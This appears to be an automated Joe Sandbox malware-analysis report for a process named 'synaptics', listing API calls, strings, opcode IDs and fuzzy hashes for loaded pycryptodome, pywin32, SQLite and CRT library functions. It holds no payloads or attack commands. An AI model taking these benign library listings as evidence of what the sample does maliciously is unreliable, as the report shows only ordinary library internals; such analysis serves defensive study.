                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$_wassertmemcpymemset
                                                                                                                                                                                                              • String ID: (x*a & 0xFFFFFFFFFFFFFFFFULL) == 1$1 & a$D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c
                                                                                                                                                                                                              • API String ID: 2198947861-1717661758
                                                                                                                                                                                                              • Opcode ID: 7e893919a1c4f831769b61733ea7b3fe0c0cdc6402edc29b0b40065e13a60cf4
                                                                                                                                                                                                              • Instruction ID: 4921e28aa23e11616b723a92ac6da6d0dd2a8984236df76c8a3da3b7f9d66321
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e893919a1c4f831769b61733ea7b3fe0c0cdc6402edc29b0b40065e13a60cf4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EC1AF72A14205ABDB10CF28CC81B6B7BF6EF89704F054568FC48A7361DB79ED148B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,00000000,?,?,?,?,6BF82C29,?,00000000,?,?,?,?,?,00000000,?), ref: 6BF82F75
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,6BF82C29,?,00000000,?,?,?), ref: 6BF82F9A
                                                                                                                                                                                                                • Part of subcall function 6BF84670: memset.VCRUNTIME140(?,00000000,?,?,?,?,?,?,?), ref: 6BF8468E
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(j <= (15-i),D:\a\pycryptodome\pycryptodome\src\mont.c,000002BB), ref: 6BF833E8
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t[2*nw] <= 1,D:\a\pycryptodome\pycryptodome\src\mont.c,000002BE), ref: 6BF83428
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF833DE
                                                                                                                                                                                                              • nw == 7, xrefs: 6BF82F13
                                                                                                                                                                                                              • m0 == 1, xrefs: 6BF82F3A
                                                                                                                                                                                                              • t[2*nw] <= 1, xrefs: 6BF83423
                                                                                                                                                                                                              • j <= (15-i), xrefs: 6BF833E3
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF8341E
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF82F0E
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF82F35
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemcpy$memset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$j <= (15-i)$m0 == 1$nw == 7$t[2*nw] <= 1
                                                                                                                                                                                                              • API String ID: 1064079204-3809659719
                                                                                                                                                                                                              • Opcode ID: 26157d5cfc6f931497a36fc76aecabe91f8f953c6e3c43007a5bd8e97fbffcd3
                                                                                                                                                                                                              • Instruction ID: 7030cef893ceeaf6d9061538dd196817d6493bde12c2182a5d6828995ae3736e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26157d5cfc6f931497a36fc76aecabe91f8f953c6e3c43007a5bd8e97fbffcd3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1024032A187418BD324CE18C89065BF3F2BFC5749F148A2EF58593334EB79E8858B46
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,6BF46624,MakeSelfRelativeSD,00000000), ref: 6BF4A239
                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001B00,00000000,6BF46624,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6BF4A29A
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(No error message is available,No error message is available,00000000,00000000,00000000,00000000), ref: 6BF4A345
                                                                                                                                                                                                              • PyUnicode_DecodeMBCS.PYTHON310(?,?,ignore,?,00000000), ref: 6BF4A370
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310((iNN),6BF46624,00000000,00000000,?,00000000), ref: 6BF4A37E
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 6BF4A399
                                                                                                                                                                                                              • PyErr_SetObject.PYTHON310(00000000), ref: 6BF4A3AA
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4A3B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Unicode_$BuildCharDeallocDecodeErr_ErrorFormatFreeFromLastLocalMessageObjectSizeValue_Wide
                                                                                                                                                                                                              • String ID: (iNN)$No error message is available$ignore
                                                                                                                                                                                                              • API String ID: 2848599001-37674240
                                                                                                                                                                                                              • Opcode ID: 54a0b39da433168ee04df24c00c38d226cabeeed6593e458eb50da53181cbd94
                                                                                                                                                                                                              • Instruction ID: 8da891cd97ca88e3acb5169b3210a6c6376b9e465ff5ba5211a33c300201aeee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54a0b39da433168ee04df24c00c38d226cabeeed6593e458eb50da53181cbd94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2412637A142014BDB189F28C854B7B3BF9FF92700F1540BCE80697676E73AE92587A1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,iOi:SetSecurityDescriptorDacl,?,?,?), ref: 6BF46A2A
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,The object is not a PyACL object), ref: 6BF46A5C
                                                                                                                                                                                                              • ?_MakeAbsoluteSD@@YAHPAXPAPAX@Z.PYWINTYPES310(?,?), ref: 6BF46A7D
                                                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 6BF46A9F
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(SetSecurityDescriptorDacl,00000000), ref: 6BF46AAF
                                                                                                                                                                                                              • ?SetSD@PySECURITY_DESCRIPTOR@@QAEHPAX@Z.PYWINTYPES310(?), ref: 6BF46AD1
                                                                                                                                                                                                                • Part of subcall function 6BF468D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF468DF
                                                                                                                                                                                                                • Part of subcall function 6BF468D0: GetSecurityDescriptorLength.ADVAPI32(?), ref: 6BF468ED
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46AFF
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF46B0A
                                                                                                                                                                                                                • Part of subcall function 6BF46540: IsValidSecurityDescriptor.ADVAPI32(00000000,?,00000000,00000000,6BF47490), ref: 6BF46548
                                                                                                                                                                                                                • Part of subcall function 6BF46540: PyErr_SetString.PYTHON310(6C7E9C54,Invalid Security descriptor,?,00000000,00000000,6BF47490), ref: 6BF4655E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SetSecurityDescriptorDacl, xrefs: 6BF46AAA
                                                                                                                                                                                                              • The object is not a PyACL object, xrefs: 6BF46A55
                                                                                                                                                                                                              • iOi:SetSecurityDescriptorDacl, xrefs: 6BF46A1D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DescriptorSecurityfree$Err_String$AbsoluteArg_DaclError@@LengthMakeParseTupleU_object@@ValidWin_
                                                                                                                                                                                                              • String ID: SetSecurityDescriptorDacl$The object is not a PyACL object$iOi:SetSecurityDescriptorDacl
                                                                                                                                                                                                              • API String ID: 57502946-4100764314
                                                                                                                                                                                                              • Opcode ID: 9f420796c59e2c43661efe603b61482331d2e586edf0a46614f2dc927e54b444
                                                                                                                                                                                                              • Instruction ID: b2d9d820718ffa49d13529c7ee5a7b170becd08341aa981e840670505569dbd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f420796c59e2c43661efe603b61482331d2e586edf0a46614f2dc927e54b444
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 883192B3614201ABC700EF64DC41A6FBFE9EE95658F0444A8FD4592233EB29D91C96A3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000008,?,?,?,?,?,?,?,?,6BF82C6B,?,?), ref: 6BF86610
                                                                                                                                                                                                              • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000007,?,?,?,?,?,?,?,6BF82C6B,?,?), ref: 6BF8662C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,6BF82C6B,?,?), ref: 6BF8663E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • partial > 0, xrefs: 6BF86725
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\endianess.h, xrefs: 6BF86720
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$free
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\endianess.h$partial > 0
                                                                                                                                                                                                              • API String ID: 171065143-2682289033
                                                                                                                                                                                                              • Opcode ID: e2eb80d9e8f489edaa33b12b188cbc5a1c119f4da0753506fa814505a410f944
                                                                                                                                                                                                              • Instruction ID: e6e64aaf6862b89bab162a978ad43aa9285bfad04cb0088ea8a51f6cab9fc1f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2eb80d9e8f489edaa33b12b188cbc5a1c119f4da0753506fa814505a410f944
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6271C933A042559FDB00CF28D99176ABBB1FF85310F448599F8499F355D735EA08CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000030), ref: 6C197C61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              • Opcode ID: ad1061933b55611cbb6534d55fc51439a350a27c6a3bd53b97e7cd8764a55aaa
                                                                                                                                                                                                              • Instruction ID: 1346f949a19cad52a6239cc562d165bb7f61fbcc1496f7256461f8ab2454eb06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad1061933b55611cbb6534d55fc51439a350a27c6a3bd53b97e7cd8764a55aaa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1712DF71A097018FD701CF29C48066AB3E1BF9A348F14865FE8656BB61D735E886CBD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C14C384
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C14C405
                                                                                                                                                                                                              • memmove.VCRUNTIME140(00000000,?,?), ref: 6C14CB24
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C14D743
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$memmove
                                                                                                                                                                                                              • String ID: Expression tree is too large (maximum depth %d)$INDEX %d$MULTI-INDEX OR$gfff
                                                                                                                                                                                                              • API String ID: 3527438329-510439031
                                                                                                                                                                                                              • Opcode ID: 5a9f58ea652aac2722f115223bd3b52614aaedf805a59aae461f0e6ca92f8e39
                                                                                                                                                                                                              • Instruction ID: d5ec52ca7d86aa495bef52caddd80ea3d375b220f1af4c3a0f9b69b750b53a05
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a9f58ea652aac2722f115223bd3b52614aaedf805a59aae461f0e6ca92f8e39
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E536774A08341CFD714DF18C490B6ABBE1FF89308F15895DE8998BB92D735E856CB82
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • table %S has %d columns but %d values were supplied, xrefs: 6C1263AD
                                                                                                                                                                                                              • rows inserted, xrefs: 6C127233
                                                                                                                                                                                                              • %d values for %d columns, xrefs: 6C126503
                                                                                                                                                                                                              • ROWID, xrefs: 6C12602A
                                                                                                                                                                                                              • table %S has no column named %s, xrefs: 6C12610C
                                                                                                                                                                                                              • cannot INSERT into generated column "%s", xrefs: 6C12608A
                                                                                                                                                                                                              • _ROWID_, xrefs: 6C12601A
                                                                                                                                                                                                              • OID, xrefs: 6C12603A
                                                                                                                                                                                                              • cannot UPSERT a view, xrefs: 6C126616
                                                                                                                                                                                                              • UPSERT not implemented for virtual table "%s", xrefs: 6C126607
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: %d values for %d columns$OID$ROWID$UPSERT not implemented for virtual table "%s"$_ROWID_$cannot INSERT into generated column "%s"$cannot UPSERT a view$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                                                              • API String ID: 0-3001108962
                                                                                                                                                                                                              • Opcode ID: 8d061bde855aeb836d2dd1f8733e68a602ffc44bed0cff4c556ee95f6d12c3b5
                                                                                                                                                                                                              • Instruction ID: 8c3d3ae4e3ac63e172e9c072442a4e3a24a50187fa1e670a9a7ebf2af6b97717
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d061bde855aeb836d2dd1f8733e68a602ffc44bed0cff4c556ee95f6d12c3b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCE28D78A083458FD714CF14C440B6BBBE2FF99308F14895DE8959BB91D739E899CB82
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nw == 9,D:\a\pycryptodome\pycryptodome\src\mont.c,00000228,00000040,?,?,?,?,?,?), ref: 6BF834AB
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(m0 == 1,D:\a\pycryptodome\pycryptodome\src\mont.c,00000229), ref: 6BF834CD
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000090,?,?,?,?,?,?), ref: 6BF83553
                                                                                                                                                                                                                • Part of subcall function 6BF85450: _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(t_nw >= a_nw + 2,D:\a\pycryptodome\pycryptodome\src\multiply_32.c,0000008F,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF8547D
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854A3
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,00000000,?,?,?,00000000,?,?,?,?,?,?), ref: 6BF854B8
                                                                                                                                                                                                                • Part of subcall function 6BF85450: memcpy.VCRUNTIME140(?,?,?), ref: 6BF85520
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • m0 == 1, xrefs: 6BF834C8
                                                                                                                                                                                                              • nw == 9, xrefs: 6BF834A6
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF834A1
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF834C3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wassertmemcpy$memset
                                                                                                                                                                                                              • String ID: D:\a\pycryptodome\pycryptodome\src\mont.c$D:\a\pycryptodome\pycryptodome\src\mont.c$m0 == 1$nw == 9
                                                                                                                                                                                                              • API String ID: 1064079204-1423678727
                                                                                                                                                                                                              • Opcode ID: e0cef45fb5e78fc33e55bc60f1e752d0fb544c4b826a606962944e953a700f04
                                                                                                                                                                                                              • Instruction ID: 285eb182bb42462d0ccbf624b677a58576de3b3a3db86e9385232eb013688844
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0cef45fb5e78fc33e55bc60f1e752d0fb544c4b826a606962944e953a700f04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B91AE72E102119FDB08CF28C881B56BBF1BF88304F458669ED48AB366E775E950CBC1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6C031878
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6C03189E
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6C031928
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6C031944
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C031964
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6C03196E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3090490537.000000006C031000.00000020.00000001.01000000.0000002A.sdmp, Offset: 6C030000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090285061.000000006C030000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090687006.000000006C033000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3090881392.000000006C035000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c030000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: d3eb0ee700dae240c720eba9ca11350aab0ccf4f697fadc4ddcc14870fadf762
                                                                                                                                                                                                              • Instruction ID: 817bd640c47952ef2bf750d9d053e629e3a3cbb4e4ff4a1743a9975738b86408
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3eb0ee700dae240c720eba9ca11350aab0ccf4f697fadc4ddcc14870fadf762
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08312B75D05229DBDF21DF65C9897CCBBF8AF09304F10419AE40DA7240EB759A85CF44
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6BFC1878
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6BFC189E
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6BFC1928
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6BFC1944
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BFC1964
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6BFC196E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3084730871.000000006BFC1000.00000020.00000001.01000000.00000031.sdmp, Offset: 6BFC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084621815.000000006BFC0000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3084925591.000000006BFC3000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085116642.000000006BFC4000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3085224740.000000006BFC5000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bfc0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: d6b2e7409748939233b634dd22261ae8e9823d348eae192bd9ccbc5c90cbd521
                                                                                                                                                                                                              • Instruction ID: 0c301aed3d755a3d9206815eb7cd5d8ed31be5a62d1f75247195a5874fc37275
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6b2e7409748939233b634dd22261ae8e9823d348eae192bd9ccbc5c90cbd521
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA313A76D452299BDF20DF64C9497CEBBB8AF08308F1041DAE408A7250EB759B888F05
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6BF4CE88
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000003), ref: 6BF4CEAE
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000050), ref: 6BF4CF38
                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 6BF4CF54
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6BF4CF74
                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 6BF4CF7E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1045392073-0
                                                                                                                                                                                                              • Opcode ID: 9262bbadf58f132da5cacdbddbfe08c5f0781e801d4b19b2514be61d0f13566e
